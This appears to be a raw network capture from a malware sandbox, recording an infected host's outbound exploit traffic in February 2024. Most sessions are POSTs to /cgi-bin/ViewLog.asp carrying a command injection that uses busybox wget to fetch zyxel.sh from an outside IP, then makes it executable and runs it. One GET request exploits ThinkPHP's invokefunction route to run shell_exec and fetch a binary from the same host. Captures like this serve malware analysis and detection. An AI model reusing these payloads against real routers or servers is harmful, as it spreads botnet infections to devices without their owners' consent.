                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        608192.168.2.145679094.64.223.2378080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:16.968584061 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        609192.168.2.1453750112.29.94.1380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:16.979763031 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:17.340507984 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:34:17 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        610192.168.2.143468831.136.63.1378080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:17.192922115 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:17.894047976 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:19.270087004 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:22.054505110 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:27.685710907 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:38.693233967 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:01.732357025 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:46.786420107 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        611192.168.2.144193431.136.176.408080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:17.193032980 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:17.894057035 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:19.270100117 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:22.054622889 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:27.685863018 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:38.693228006 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:01.732367992 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:46.786519051 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        612192.168.2.144744894.187.113.1788080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:17.213697910 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        613192.168.2.145278294.123.105.778080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:17.221056938 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        614192.168.2.145347294.121.183.2308080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:17.221302986 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        615192.168.2.144900694.24.37.1138080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:17.393389940 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:17.593620062 CET172INHTTP/1.1 404 Not Found
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Headers: MEGA-Chrome-Antileak
                                                        Access-Control-Max-Age: 86400
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        616192.168.2.145201831.136.169.1988080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:17.414266109 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:18.086188078 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:19.429977894 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:22.309993029 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:27.685677052 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:38.437248945 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:01.732378960 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:44.738596916 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        617192.168.2.144494231.200.82.708080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:17.461385012 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        618192.168.2.144526431.10.12.838080
                                                        TimestampBytes transferredDirectionData
